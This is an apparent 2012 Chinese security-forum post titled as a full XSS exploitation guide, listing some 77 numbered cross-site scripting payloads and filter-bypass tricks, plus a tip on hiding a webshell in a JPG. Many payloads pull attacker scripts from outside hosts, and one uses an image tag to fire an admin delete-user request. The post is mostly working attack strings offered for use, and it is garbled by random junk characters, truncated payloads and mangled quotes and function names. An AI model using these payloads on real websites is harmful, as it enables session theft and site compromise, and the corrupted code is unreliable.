找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2177|回复: 0
打印 上一主题 下一主题

xss详细利用大全1

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:04:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
跨站图片shell
1 Q& J2 B7 L0 C6 T$ }7 r8 @$ ~/ s1 kXSS跨站代码  <script>alert("")</script>. Q1 ^1 M' V* z4 n1 ?% z; [6 I
, D' [" ~8 W* [" {: h7 U) B1 a
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马) Q% j8 o# x3 G) g' N: \
/ ]* b5 N, F) C0 g( W0 T8 Y# L
5 j9 B+ a% h" D) S6 R# ~

$ ]$ f8 n2 M1 S/ c7 t1)普通的XSS JavaScript注入
6 [: _$ x  A. u  T* ]* s: q9 A<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>- g" i  x5 `5 U0 f3 u' |

. e# ]; {0 H) v4 W! v! b) I(2)IMG标签XSS使用JavaScript命令
4 m/ x$ a* j, e1 G2 X* b<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& H! i0 }% u" f  i! |, m
6 C2 r" c' D7 d: [(3)IMG标签无分号无引号$ \: i! }8 y6 o4 T0 I
<IMG SRC=javascript:alert(‘XSS’)>
! Z" x8 A- B% }& u! t: ?- J4 d' z. s; R. ~( K7 o  [5 O
(4)IMG标签大小写不敏感% h1 \; R  H. N$ \1 A: {% i- K
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
  N# ]7 ^7 k- N# C$ r/ n; t+ R( W1 |+ y6 p! o
(5)HTML编码(必须有分号)6 e. C8 q6 G+ q6 l& _2 P
<IMG SRC=javascript:alert(“XSS”)># z* k9 y( l" s$ K# O

( f) r: e# f% e8 I8 G1 V  B(6)修正缺陷IMG标签
- |$ t) m; c# {4 r4 {<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>2 L) e  f# t4 y# S9 V% i  o1 @

0 O0 f/ V' B8 A' y(7)formCharCode标签(计算器)
( }8 A$ C0 ?0 b! W<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
0 ^' h( |; ^1 e- [( @4 T, E, Y5 ]
: E% ]* N% `+ O& k(8)UTF-8的Unicode编码(计算器)& c1 T1 O+ m7 h4 \6 |" u9 W
<IMG SRC=jav..省略..S')>
, W. P' k$ s8 Q) |
! _' i  f: G# n2 R) E# G(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
* K: f, C8 l+ k! N0 p- p) B1 P1 g<IMG SRC=jav..省略..S')>9 J( I5 {$ c- {+ o. T4 L/ f

3 f/ Q5 B3 A( B& `7 K; j! u: Z(10)十六进制编码也是没有分号(计算器)  Y5 ]3 q+ d8 D/ G6 ~$ Z( R4 [
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>3 q# ^' R7 f7 e" h8 r

( e% d: O7 _. H9 U(11)嵌入式标签,将Javascript分开9 R- R; Y8 V5 C1 K+ i; [5 d  N; ^
<IMG SRC=”jav ascript:alert(‘XSS’);”>" _& c2 u- Y4 p4 ~
0 v3 f; |' [4 h$ h) Z1 I0 |. ]
(12)嵌入式编码标签,将Javascript分开9 f. m/ T4 B/ h0 ]" n' w
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 G; c0 F( {# O

4 k3 Y4 F1 A& K% @# V( q(13)嵌入式换行符
; F& |' I9 U6 K8 h& _) S<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 o& ?8 H$ K* e: _9 O/ Q# E& n
(14)嵌入式回车( D- x- V: t5 i9 N, S
<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ N' J) S8 n; l0 W3 ?1 V/ ]- y: j' R, \
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
% r, _5 \. y3 N; }* u, y<IMG SRC=”javascript:alert(‘XSS‘)”>
, @1 w2 t' n5 T
/ v; i8 e6 J* h' x, @. p(16)解决限制字符(要求同页面)
; A8 J, q4 B3 I# g& E<script>z=’document.’</script>
& Y; ]6 t- y7 T<script>z=z+’write(“‘</script>
! j" E  j3 f: c+ S<script>z=z+’<script’</script>' g3 L& }, H1 [  U
<script>z=z+’ src=ht’</script>, x+ r; \! D4 s$ r$ w/ p; o. b7 E: ?
<script>z=z+’tp://ww’</script>. s7 {- a% K# J/ R* ^+ W
<script>z=z+’w.shell’</script>
7 w8 ~, n, P: `9 Q4 z' A<script>z=z+’.net/1.’</script>
' T3 y# ^% g& J5 L" `4 A<script>z=z+’js></sc’</script>/ l, O/ k. x0 f( y
<script>z=z+’ript>”)’</script>
! B/ ]; }5 X+ b/ _<script>eval_r(z)</script>! @9 H, T* B; P  a9 |3 G; }3 O
3 I% \/ Q7 r9 y% e7 K9 y
(17)空字符$ y2 f/ V5 B9 F& a' F
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out6 K2 |. a. h; a) E2 C

+ b( V/ E$ Z, Z4 [$ g(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
) Z- b; X: m0 T* Q, O# ?- lperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out# c( a3 U  z6 [! J) t

6 Y% n" Q$ Y: V+ q- [% W(19)Spaces和meta前的IMG标签1 d* N# q* B' ?) F4 [
<IMG SRC=” javascript:alert(‘XSS’);”>
% j( l& @+ v' S. K/ H: _6 y& X
2 M& |' A( `5 }/ V$ X- u& m: o+ x$ q(20)Non-alpha-non-digit XSS+ q* n& M( q5 M% q. _  v" N7 Q8 x
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>! G! ~; Z2 \3 V' q0 u' t/ {* r

) p3 L0 o: X5 G! X" H6 W$ V(21)Non-alpha-non-digit XSS to 2
$ l; C3 ?  b! X( M2 R1 G0 ]<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>3 y) J6 A* M1 p7 s
1 c, p: ~5 k' Z7 y# y
(22)Non-alpha-non-digit XSS to 3
; _0 _9 C6 X" u+ S9 R8 G& a<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
4 ?1 t; U0 I; n6 }" \2 W% ?( e& f3 D2 c) a' {
(23)双开括号0 P* _# ]5 W: y" C
<<SCRIPT>alert(“XSS”);//<</SCRIPT>* I0 b, @0 |. r  t  K. u
: T- s( o( T. Q$ B0 s
(24)无结束脚本标记(仅火狐等浏览器)) a/ D2 ]8 w4 P+ o: {
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
- ?* \( N+ n$ A" A5 F/ r
1 [# e1 m% g  Z5 U(25)无结束脚本标记2  x0 R+ q7 @3 Y9 I+ q& q4 {
<SCRIPT SRC=//3w.org/XSS/xss.js>
( l  i8 ~3 o* z& L$ E, m9 _
$ v* a" l" ^  S7 {- p" k(26)半开的HTML/JavaScript XSS4 a1 U: C) k* }, u5 h
<IMG SRC=”javascript:alert(‘XSS’)”
# k& _  y# `9 Y  G" F
0 y. F: C$ A; g1 A(27)双开角括号
6 k5 ^, x/ J  y5 |/ n<iframe src=http://3w.org/XSS.html <( x7 ?& J. b! z6 U/ z
' Y' }$ P5 O* N4 D1 H5 F* k* o3 ?
(28)无单引号 双引号 分号. A8 ?1 l/ w0 N2 u+ w/ y$ u
<SCRIPT>a=/XSS/
. S5 }1 T; B1 I$ y' ^9 kalert(a.source)</SCRIPT>
; q" E3 j6 e5 l# D5 h  O( w/ m) E& b! h# E- h
(29)换码过滤的JavaScript
, w; b$ G( c, \# w- ]\”;alert(‘XSS’);//* G* ~5 y8 c# _/ i/ ?

6 ~6 \$ J. L4 F2 r9 ^(30)结束Title标签, b3 w! L" @8 U7 p8 S
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>8 H' g5 c5 q* I. T  M
3 m! h1 h) ^; r. P
(31)Input Image7 I, f. S: b1 _2 L  w! }' w. x
<INPUT SRC=”javascript:alert(‘XSS’);”>: s/ E1 ~& Q# [% j; N: {
3 K: q9 [9 {3 Q4 }! b
(32)BODY Image
' s- A$ l1 o8 {5 ^) U<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- q' y' [6 W1 r; X2 d, e! L0 A0 q7 Y9 M- W( Z2 o
(33)BODY标签
' h1 |- u2 t' p( h: n<BODY(‘XSS’)>
: W; o  R0 r9 e6 B, H1 F2 a% S( e
(34)IMG Dynsrc
6 _  |2 x9 }. k<IMG DYNSRC=”javascript:alert(‘XSS’)”>
9 [  Y  G) A$ M8 j: w# A( Y& X* J( u5 z! B4 }0 G  q" M! J
(35)IMG Lowsrc
! \) k& q" s0 Y+ C: Y<IMG LOWSRC=”javascript:alert(‘XSS’)”>1 m1 X) t8 B( {8 `  _4 ?) @: |6 d

0 E' ]* |+ x( d, v) j4 |' c( _(36)BGSOUND
8 [- [" p1 }7 J2 D: ^. P- C<BGSOUND SRC=”javascript:alert(‘XSS’);”>
0 k# p. T9 d" g7 C6 J9 G! A4 P! z# z, |. _$ Q
(37)STYLE sheet
" j2 F5 G9 A1 n" _$ S% t8 Z<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
+ _- R# J( m" k3 D7 u' Q9 L" J) a5 ~& l8 C, I% `* f; K
(38)远程样式表* i- O# |: ]& m7 V
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
5 ~. v5 b2 ^: @/ F0 s. d" v. Y  s- `! w4 ?
(39)List-style-image(列表式)
5 m/ ]0 ]& b4 O# ?1 L/ M1 B0 ]  q<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
7 S& }% ]3 A! o: y  u+ Z1 w9 T' t$ a9 P2 Z' s4 C  O
(40)IMG VBscript
6 z6 L8 U* F# L* o<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS% g$ u# n& L$ D  L2 S/ |$ ~0 q
! s+ _0 d& K" X5 a- N
(41)META链接url
$ F  _/ t: r- [9 l<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>% f; T7 ~0 V5 z4 v% J  ]

7 v3 ^! t! g3 y(42)Iframe/ v) w: }3 T: D4 b  ?9 Y
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>' |9 B) S0 Y  K8 c( v
(43)Frame: Y. q! @. D) o$ X3 [, U" y1 [
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
. \3 q: v: Q- z7 r! y6 z$ e: n" Q% G& N; j( u- {& x) b
(44)Table
; c) x3 |  L4 r* ^2 e3 @<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
4 H7 ~3 M0 g4 e6 P- |  f3 @# q/ U* F( P
(45)TD
, G; b" }( J6 ~- I0 U) u<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>6 T% Z: P$ z- \, }4 L. J5 c9 J
- L5 ]3 t2 f" u9 I$ q
(46)DIV background-image
: f4 i6 u' U3 Y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>& f' [, t2 B( ?. _2 J- y

7 b1 M- F' N+ z7 C0 g" U(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)- h3 e; a+ t4 v3 \
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
: _) j$ l0 E+ y
8 E4 `4 }; T3 k& Q0 ~' L(48)DIV expression  }3 l2 x* Z6 N5 z
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
  ^; ~% _7 k2 W* J( b5 I2 l* e
(49)STYLE属性分拆表达4 j: w  A; X6 J
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
+ t' v! _9 i5 Z! i0 h1 f' V7 q3 N& Q; ]& L! v! Q7 e- W9 d7 h
(50)匿名STYLE(组成:开角号和一个字母开头)- k! p8 T6 }. _( E7 Z- J& H
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
; j; ~5 l% P8 Z7 J  ~' @- {& I( B9 A( l  ]0 N5 l% e$ X
(51)STYLE background-image
4 P: |6 P7 G' l- l8 E& l<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
) |5 Y8 H; w4 E6 X6 {6 O; o/ x$ C
(52)IMG STYLE方式7 Q: v3 @/ }6 y. L0 d+ h
exppression(alert(“XSS”))’>
* b. `! w' G6 F+ w( u8 H: U* U* c. L! J( t, [* `3 `- u
(53)STYLE background0 u" j, J% ^# W; Z6 ]
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
+ U9 F2 I+ [# K2 I8 T. T0 A) F
# t8 S) A+ N: p6 d2 a(54)BASE
! ?. I/ ?8 ]( V$ c$ M# p; C<BASE HREF=”javascript:alert(‘XSS’);//”>/ h( F6 }; i( ?1 ^  Y$ j* |* E
) y, o% k: b! r% }9 b- }
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
3 G+ w" P( V9 n5 l' \- m3 A<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
) X3 H  j  K$ H) W4 j7 F) ]
) `; e' f) p' z4 [! c, P. O& D(56)在flash中使用ActionScrpt可以混进你XSS的代码
5 w" O0 ^1 y$ R, P$ r: Ba=”get”;+ g! L! p4 N8 L% ]& _+ r" v
b=”URL(\”";
2 j2 K  T" [) Z1 U! w; j# uc=”javascript:”;. S  q% N& |% I) V
d=”alert(‘XSS’);\”)”;
6 }8 I" d! T. m/ v0 `eval_r(a+b+c+d);! j2 \' W1 j# A: B7 L- P
; H/ Q% Y& c3 h& l0 x; d7 V
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上. w$ R, b8 i0 ]1 T. L
<HTML xmlns:xss>1 Y, V# E# D. j( M  D
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>9 ~, N9 b7 u, k4 K0 n
<xss:xss>XSS</xss:xss>3 S: w. C$ u$ e+ f5 l
</HTML>
% O7 `0 \! S# C) u3 a3 M1 h  b3 s4 z3 z1 G6 A& u
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
* k% `' z8 S2 R4 U8 {  f<SCRIPT SRC=””></SCRIPT>
9 m& _0 ]0 X9 a. ]( V  e% A8 k6 A/ B7 X; z$ e
(59)IMG嵌入式命令,可执行任意命令
3 C+ x( o3 \' j+ o<IMG SRC=”http://www.XXX.com/a.php?a=b”>
8 q2 T% b. b: H  j5 \6 X+ c2 }# g# p9 T
(60)IMG嵌入式命令(a.jpg在同服务器)
  g, D$ w5 R/ Q+ ~3 U: E& NRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser& Q% z/ M, V4 C  z

7 S; A* k$ g, |' g$ s- s, c(61)绕符号过滤3 t- E4 D' d/ s5 v  q
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT># Q3 i9 m5 R- I

( a0 m1 b2 ]# m& |, l$ k, Q(62)
% I) ^3 f) p5 ]: D<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 E# g' r( i2 J! _
" f$ l& h7 s3 P2 z( X; S(63)& P* b: U( d" ]( [. a" c
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
, m; C8 P, A* K% j- f2 q! W7 w  g- K" d
(64)! s) `5 m- i2 o' `9 H5 n
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>: G. ?; v+ M- N6 W  d: A

" K! k/ a; P# U+ n$ u& ]+ o(65)
! l; H% S/ [" c# O<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
* M- A; g. }( w1 J3 F
' O8 o0 f  C  c  f(66)6 }4 s9 [  @+ R
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
- P% M( s  |0 |& ]
; N+ k0 J9 S" V(67)
/ _1 s6 H2 S* \; I& w<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
! o2 [9 b, s2 i
' T4 F7 l1 H8 W/ P: O. p5 X1 I(68)URL绕行0 R2 s' f. E4 ^6 V
<A HREF=”http://127.0.0.1/”>XSS</A>
6 c' r- V: c  U3 z. E8 u
: C: S8 E* Z1 |0 V5 u(69)URL编码
, `0 H% [+ j& [. _/ s7 ?6 D<A HREF=”http://3w.org”>XSS</A>6 f, ?* X+ o: {3 Y7 m2 }* t
( M/ h& C' m+ T) e' i5 P
(70)IP十进制
6 N7 G2 M$ j! m  g/ o<A HREF=”http://3232235521″>XSS</A>: n& e3 K! P' F9 ?& R% J8 ]6 \
" `3 Y! t) w" \" w6 s% J
(71)IP十六进制" F% k0 U* f8 z0 S
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>. ^7 Z- G* [2 A  J" W9 E
6 b3 y4 d7 Q7 @6 G. ^2 I8 `. X
(72)IP八进制- A& H* J1 H0 D" I3 Q4 l
<A HREF=”http://0300.0250.0000.0001″>XSS</A>; E! n& K# m2 S' V, ?' I

1 q# F  k5 L0 C. l& z! [(73)混合编码
9 [! |/ y0 B: D3 m& d7 a<A HREF=”h) g0 ]0 v# G/ c! ^  i7 _4 L
tt p://6 6.000146.0×7.147/”">XSS</A>
) Z8 b+ R8 c& G1 y: \% |3 ]
! L) q/ V' [: F' Q. k' L, w# o(74)节省[http:]% L5 f0 c* K  Z; n4 @6 L# m+ o+ m" z9 d
<A HREF=”//www.google.com/”>XSS</A>* s1 m5 ~/ p0 c

3 v$ V2 Q9 g6 g( w4 ^! m$ @) K(75)节省[www]
2 m1 ]( E' v* M/ ^8 g<A HREF=”http://google.com/”>XSS</A>1 C9 r& q4 f1 @% l4 p7 B

2 ^0 d& ~0 f" A+ |5 ^1 i8 H3 Y% c(76)绝对点绝对DNS
  d9 {* l( Z3 d9 J<A HREF=”http://www.google.com./”>XSS</A>
* K- s- |* J6 t4 |# l6 }' L3 ]6 l  ?8 m" E1 A  X7 {
(77)javascript链接
1 c) E: q& L+ B/ y<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>+ o" r8 w5 E- C2 u" s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表